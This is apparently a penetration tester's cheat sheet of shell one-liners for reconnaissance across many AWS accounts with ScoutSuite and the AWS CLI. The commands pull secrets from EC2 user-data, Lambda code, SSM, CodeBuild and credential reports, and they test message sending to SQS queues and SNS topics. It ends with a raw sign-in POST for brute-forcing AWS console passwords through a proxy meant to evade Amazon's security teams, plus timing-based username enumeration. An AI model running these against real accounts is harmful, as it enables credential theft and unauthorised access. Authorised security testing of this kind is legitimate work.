ScoutSuite Reconnaissance
These oneliners are useful for extracting data from multiple ScoutSuite reports. This usually occurs when there are multiple accounts provided as being in scope. Extracting specific information across all the resources, across all the regions, and across all the accounts can be very cumbersome. These oneliners assume you have already ran ScoutSuite against all the accounts using the credentials or a configured AssumeRole ARN they provided for you.
ScoutSuite Against Multiple Accounts
Most customers provide us a list of accounts that we need to test. Trying to scale our cloud offering to support situations like this can be a lot of work when manually executed. Because ScoutSuite doesn’t support multiple account runs, I usually create a separate profile for each of the customer’s accounts. Outpost is a tool that will help facilitate the generation of account profiles for an account that has AssumeRole privileges, as well as, generate critical findings for our report format.
The following oneliner will help run and generate a ScoutSuite report and log file, when a list of profiles generated from account numbers has been set in the ~/.aws/config file.
ScoutSuite Account Loop
cat accounts.txt | while read a; do python scout.py aws --profile $a --no-browser --report-dir ./reports/$a/ --report-name $a --logfile ./logs/$a.log; done
Extract unique URL’s from each txt file
After extracting the below resource data from ScoutSuite reports, it’s good to also extract the URL’s from all of the files. It’s helpful for identifying additional attack surfaces.
grep -hEo "(http|https|ftp|ftps)://[a-zA-Z0-9./?=_-]*" *.txt | sort -u
Process file from the Outpost data_archive and Open Report
(example uses sendmessage_authorized_to_all_principals.txt)
cat sendmessage_authorized_to_all_principals.txt | sed -e 's/,/ /g' | sort -u | awk '{cmd="open ../"$1"/"$1".html"; cmd | getline rep; print rep}'
Resource Reconnaissance
Clone the following repo and follow installation instructions to identify all service resources: https://github.com/JohannesEbke/aws_list_all
Retrieve all resources for each account and the regions you want
for a in $(cat accounts.txt); do aws-list-all query --directory ./archive/data/$a --profile $a --region us-east-1 --region us-east-2 --parallel 20; done
Display number of resources for each service
for a in $(cat accounts.txt); do aws-list-all show ./archive/data/$a/*; done
Display resources for each service
Retrieve all resources for all accounts in verbose mode
for a in $(cat accounts.txt); do aws-list-all show ./archive/data/$a/* --verbose; done
Retrieve all resources for all accounts in verbose mode, into separate files
for a in $(cat accounts.txt); do aws-list-all show ./archive/data/$a/* --verbose > all_"$a"_resources.txt; done
Parse all resource files into one file and extract counts then sort
This will drastically help you focus on the resources that actually exist. Once you get the data, you need to go grep the types of resources from the individual files, so I’d recommend first retrieving all resources for each account into separate files.
Step 1: Grab just the counts using aws-list-all
for a in $(cat accounts.txt); do aws-list-all show ./$a/* >> all_resources_counts.txt; done
Step 2: Do some sed, sort, and awk to sum up the total of each type of resources
cat all_resources_counts.txt | sed -e 's/ .*-.*-[0-9]//g' -e 's/ >//g' | grep -v '^$' | sort -u | awk '{a[$1" "$2" "$3]+=$4;}END{for(i in a)print i" "a[i];}' | sort -u
Step 3: Analyze the results and zero in on specific resource types
EC2 User-data
A lot of customers deploy EC2 instances with user-data so that they can provision/on-board within their fleet. If you inspect the user-data, you will regularly find credentials, tokens, keys, passwords, URLs, and other sensitive information. This oneliner searches all child folders for the scoutsuite_results_xx.js file, converts it into useable JSON, then queries all regions/vpcs/instances for user_data.
EC2 User-data that ScoutSuite thinks is Secrets
find . -type f -name 'scoutsuite_results*.js' -exec tail -n +2 {} \; | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data_secrets != null) | .arn, .user_data_secrets'
EC2 User-data
find . -type f -name 'scoutsuite_results*.js' -exec tail -n +2 {} \; | jq '.services.ec2.regions[].vpcs[].instances[] | select (.user_data != null) | .arn, .user_data'
Lambda
When it comes to Lambda functions, they are mini serverless compute environments and sometimes need access to data that can modified on the fly. AWS created environmental variables for functions to be provisioned with. As a tester, extracting environment variables is a great way to uncover sensitive data like credentials, tokens, keys, and other useful information. This oneliner searches all child folders for the scoutsuite_results_xx.js file, converts it to useable JSON, then queries all regions and functions for env_variables.
Extract environment variables for each function from Scout
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn, .env_variables'; done
Lambda Function Code
Inspecting the Lambda function code is important because a lot of organizations embed hardcoded secrets in the Functions. As a tester, uncover sensitive data like credentials, tokens, keys, and other useful information is possible by downloading and unzipping the function code. The standard minimal read-only policy in ScoutSuite doesn’t have the ability to read this data. The permission lambda:GetFunctionConfiguration needs to be added to the policy. This oneliner searches all child folders for the scoutsuite_results_xx.js file, converts it to useable JSON, queries for all the lambda ARN’s, parses them, and then calls get-function to retrieve the download URL. The output of this is in CSV format.
Retrieve download URL for each function from Scout
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.awslambda.regions[].functions[] | select (.arn) | .arn'; done | sed -e 's/:/ /g' -e 's/"//g' | awk '{cmd="aws --profile "$5" --region "$4" lambda get-function --function-name "$7" --query Code.Location"; cmd | getline url; print $5,$4,$7, url}' | sed -e 's/"//g' | awk '{print $1","$2","$3","$4}' > lambda_function_code.txt
Retrieve download URL for each function from AWS
for a in $(cat accounts.txt); do for region in {"us-east-1","us-east-2"}; do aws --profile $a --region $region lambda list-functions --query 'Functions[*].FunctionArn' | jq -r '.[]' | sed -e 's/:/ /g' -e 's/"//g' | awk '{cmd="aws --profile "$5" --region "$4" lambda get-function --function-name "$7" --query Code.Location"; cmd | getline url; print $5,$4,$7, url}' | sed -e 's/"//g' | awk '{print $1","$2","$3","$4}'; done; done > all_lambda_urls.txt
Extract the URL from the above CSV output, just parse the output
cat lambda_function_code.txt | sed -e 's/,/ /g' | grep -v null | awk '{print $4}' > lambda_urls.txt
Download all the URL’s (requires parallel)
WARNING: Download links have a short timeout window
cat lambda_urls.txt | parallel --gnu "wget -q {}"
Rename all the Zips and add an extension
find . -type f -exec mv '{}' '{}'.zip \;
Unpack all the zips into their own directory
ls *.zip | sed -e 's/?/ /g' | awk '{print $1}' | parallel --gnu "unzip -d {} {}*"
GoldDigger to search for sensitive information within source code
https://git.nopsled.me/mike.felch/golddigger
git clone https://git.nopsled.me/mike.felch/golddigger
cd golddigger
virtualenv -p python3 .
source bin/activate
python dig.py --help
SQS Queues
One of the more under-discussed attack surfaces within AWS, SQS queues are regularly misconfigured to authorize any AWS principal to leverage actions, such as, ReceiveMessage/SendMessage. Enumerating SQS queues using receive-message can sometimes provide a message payload to use during the send-message testing. This oneliner simply extracts the queue URLs from all scoutsuite_result_xx.js files which you can then use with aws sqs receive-message —queue-url <queue_url> from your own external account. Don’t forget to change the region.
Extract each queue URL
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.sqs.regions[].queues[] | select (.QueueUrl) | .QueueUrl' ; done | sed -e 's/"//g'
Test each queue URL using Receive Message
for q in $(cat sqs_urls.txt); do echo "$q" && aws sqs receive-message --queue-url "$q" --region us-east-1; done
Test each queue URL using Send Message
for q in $(cat sqs_queues.txt); do echo "$q" && aws sqs send-message --queue-url "$q" --message-body "BHIS Test" --region us-east-1; done
Extract each queue and test using proper region
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq -r '.services.sqs.regions[].queues[] | select (.arn) | .arn' | sed -e 's/:/ /g' | awk '{print $5" => "$6; cmd="aws --profile "$5" sqs send-message --region "$4" --queue-url https://queue.amazonaws.com/"$5"/"$6" --message-body \"BHIS Pentest: Please send a screenshot to mike@blackhillsinfosec.com\""; cmd | getline response}'; done
ACM Certificates
AWS certificate manager is a great place to retrieve additional attack surface. By listing the certificates and extracting the domain name, you can quickly identify new potential targets.
Extract All Hosts from ACM Certificates
for a in $(cat accounts.txt); do aws --profile $a acm list-certificates --region us-east-1 | jq -r '.CertificateSummaryList[] | select (.DomainName) | .DomainName' >> all_cert_hosts.txt; done
SNS Topics
Similar to SQS queues, SNS topics is another under-discussed attack surface within AWS. SNS topics are regularly misconfigured to authorize any AWS principal to leverage actions, such as, Publish/Receive/Subscribe. A lot of times, SNS topics have subscriptions that are tied to other AWS resources like SQS, Lambda, or even email distribution groups. This oneline extracts all the ARN’s for each of the SNS topics across all scoutsuite_result_xx.js files. Don’t forget to change the region.
Extract each topic ARN
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.sns.regions[].topics[] | select (.arn) | .arn' ; done | sed -e 's/"//g'
Test each topic ARN
for q in $(cat sns_topics.txt); do echo "$q" && aws sns publish --message "BHIS Pentest, please email <your email> stating you received this message" --topic-arn "$q" --region us-east-1; done
Extract each topic and test using proper region
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq -r '.services.sns.regions[].topics[] | select (.arn) | .arn' | sed -e 's/:/ /g' | awk '{print $5" => "$6; cmd="aws --profile "$5" sns publish --region "$4" --topic-arn \""$1":"$2":"$3":"$4":"$5":"$6"\" --message \"BHIS Pentest: Please send a screenshot to mike@blackhillsinfosec.com\""; cmd | getline response}'; done
S3 Buckets
Storage in AWS is handled by S3. Extracing all the S3 bucket names then attempting to list files using a separate account is a quick way to identify misconfigured buckets. Looking for interesting files in S3 is a great way to gain lateral movement or privilege escalation. Additionally, gaining access to sensitive data is a common scope engagement so checking in S3 buckets is a great way to accomplish this task.
Extract each bucket name
for r in $(find . -type f -name 'scoutsuite_results*.js'); do cat "$r" | tail -n +2 | jq '.services.s3.buckets[] | select (.name) | .name' ; done | sed -e 's/"//g'
Recursively List Files in All Account Buckets
for a in $(cat accounts.txt); do for b in $(aws --profile $a s3 ls | awk '{print $3}'); do echo "$a,$b" && aws --profile $a s3 ls s3://$b --recursive; done; done >> archive/data/s3_files.txt
CloudFormation
Hunting for sensitive information in CloudFormation, such as passwords and credentials, can be checked by querying AWS for the stack parameters and outputs. Sometimes customers deploy CloudFormation templates with sensitive data for provisioning services instead of using SecretsManager or the Systems Manager Parameter Store. Don’t forget to change the region.
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" cloudformation describe-stacks --query 'Stacks[*].[StackName, Description, Parameters, Outputs]' --region us-east-1; done
External Host Addresses
Looking for external accessible infrastructure can be accomplished by querying all the resources available within the AWS account. Once you have the external infrastructure, you can follow your normal external pentest workflows. Don’t forget to change the region.
EIP Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ec2 describe-addresses --query 'Addresses[*].PublicIp' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
EC2 IP Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ec2 describe-instances --query 'Reservations[].Instances[].PublicIpAddress' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
ELB Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" elbv2 describe-load-balancers --query 'LoadBalancers[*].DNSName' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
RDS Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" rds describe-db-instances --query='DBInstances[*].Endpoint.Address' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
API Gateways
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" apigateway get-rest-apis --region us-east-1; done | grep "\"id\"" | sed -e 's/:/ /g' | awk '{print $NF}' | sed -e 's/\"//g' -e 's/,//g' | awk '{print $1".execute-api.us-east-1.amazonaws.com"}'
EBS Addresses
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" elasticbeanstalk describe-environments --query 'Environments[*].EndpointURL' --region us-east-1; done | grep "\"" | sed -e 's/\"//g' -e 's/,//g'
CodeBuild Secrets
AWS provides developers a fully managed CI service called CodeBuild. Sometimes developers will provision environment variables with sensitive data or credentials. In order to identify potential secrets, we first need to query an account for all the project names. We will then compile a space-delimited list of the names and query the batch-get-projects endpoint which will provide us the environment variables. They are name/value pairs that may contain passwords, keys, or other useful information. Don’t forget to change the region.
CodeBuild Projects
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" codebuild list-projects --query 'projects[*]' --region us-east-1 | jq -r '.[]'; done
CodeBuild Environment Variables
aws codebuild batch-get-projects --names PROJECT1 PROJECT2 --query "projects[*].environment" --region us-east-1
SSM Parameter Secrets
The AWS Systems Manager Parameter Store handles text and credentials for use within AWS services. Sometimes sensitive data is stored which provides an opportunity to gather credentials or other sensitive data. The first thing we need to do is query SSM for the parameters. After retrieving a list of parameters, we can examine the type of parameter it is to see whether or not it’s secured. If not, we can directly retrieve the parameter value. Don’t forget to change the region.
Describe Parameters
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" ssm describe-parameters --query 'Parameters[*].[Name, Description, Type]' --output text --region us-east-1; done
Retrieve Parameter Value
aws ssm get-parameter --name 'PARAMETER-NAME' --query 'Parameter.Value' --output text --region us-east-1
Unencrypted EBS
A common finding with ScoutSuite is unencrypted volumes and snapshots. Depending on how large the environment is, this can quickly get into the thousands. Instead of including each individual snapshot and volume in the report, try to supply the list within the data archive and just provide a high-level overview of the number of unencrypted resources for each account. To achieve this, you can extract the resources missing encryption into a text file using Outpost and parse the results into a summary using the following:
Volumes
cat ebs_volume_not_encrypted.txt | cut -d, -f1 | sort -n | uniq -c | awk -vOFS=, '{print "Account: "$2" with "$1" Unencrypted Volumes"}'
Snapshots
cat ebs_snapshot_not_encrypted.txt | cut -d, -f1 | sort -n | uniq -c | awk -vOFS=, '{print "Account: "$2" with "$1" Unencrypted Snapshots"}'
CloudTrail
Be sure to check that each region is configured for CloudTrail otherwise an attacker that successfully deploys resources could evade logging and monitoring by selecting a region where CloudTrail is not enabled.
Carve the accounts and regions from the Outpost data
cat cloudtrail_service_not_configured.txt | sed -e 's/.NotConfigured//g' -e 's/cloudtrail.regions.//g' | awk -F ',' '{if($1 in accounts){accounts[$1]=accounts[$1] OFS $2} else {accounts[$1]=$2}} END {for(a in accounts) {print a; split(accounts[a],arr," "); for(i in arr) {print arr[i]}}}'
Credential Reports and Passwords
Examined when users were created and passwords were last changed are vital when an AWS account does not have a password policy set. On November 18th 2020, Amazon changed the default password policy settings to require a minimum of 8 characters, including a mixture of special and numeric characters, and cannot have passwords that are identical to the AWS account name or email address. This means that if an AWS account does not have a password policy set and the user account passwords were last set prior to 2020-11-18, the user account is at risk of having a weak password. The following statements will help generate and retrieve the credential report (https://aws.amazon.com/blogs/security/aws-iam-introduces-updated-policy-defaults-for-iam-user-passwords/):
Check Password Policies
for a in $(cat accounts.txt); do echo "$a" && aws --profile "$a" iam get-account-password-policy; done;
If no password policy is set, run the following commands and check the user account dates
Generate Credential Reports
for a in $(cat accounts.txt); do echo "$a" && aws --profile $a iam generate-credential-report; done;
Retrieve Credential Reports
for a in $(cat accounts.txt); do echo "$a" && aws --profile $a iam get-credential-report --output text --query Content | base64 -D >> "$a.csv"; done;
Parse Credential Reports for Dates
for c in $(ls *.csv); do echo "$c" && cat "$c" | sed -e 's/,/ /g' | awk '{print $1,$3,$6}' | sed -e 's/ /,/g' | column -t -s,; done
Parse Credential Reports for Root MFA
for c in $(ls archive/data/credential_reports/*.csv); do echo "$c" && cat "$c" | sed -e 's/,/ /g' | awk '{print $1,$8}' | sed -e 's/ /,/g' | column -t -s, | grep "root_account"; done
Brute Force Passwords
This is not public tradecraft The following request can be repeated, just replace account, username, and password using Burp Intruder. I suggest creating a Fireprox proxy and pointing it to us-east-2.signin.aws.amazon.com and add an X-My-X-Forwarded-For header so that you can avoid Amazon security teams. AWS does NOT have a lockout policy (https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_passwords_account-policy.html):
POST /authenticate HTTP/1.1
Host: us-east-2.signin.aws.amazon.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 192
Connection: close
action=iam-user-authentication&account=XXXX&username=XXXX&password=XXXX&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome
Username Enumeration
This is not public tradecraft - seems to be patched now :( Using the above authentication POST payload with the Timeinator plugin for Burp, it’s possible to enumerate valid usernames. Load the usernames in the Payload section of the Attack tab. For “Number of requests for each payload”, set it to 10. Next, add a marker around the username variable and click “Start Attack”. Next, sort the results panel on “Minimum (ms)” and all the real accounts will have the lowest time with all the bad accounts having a minimum ms time of 10-20ms higher than the good accounts.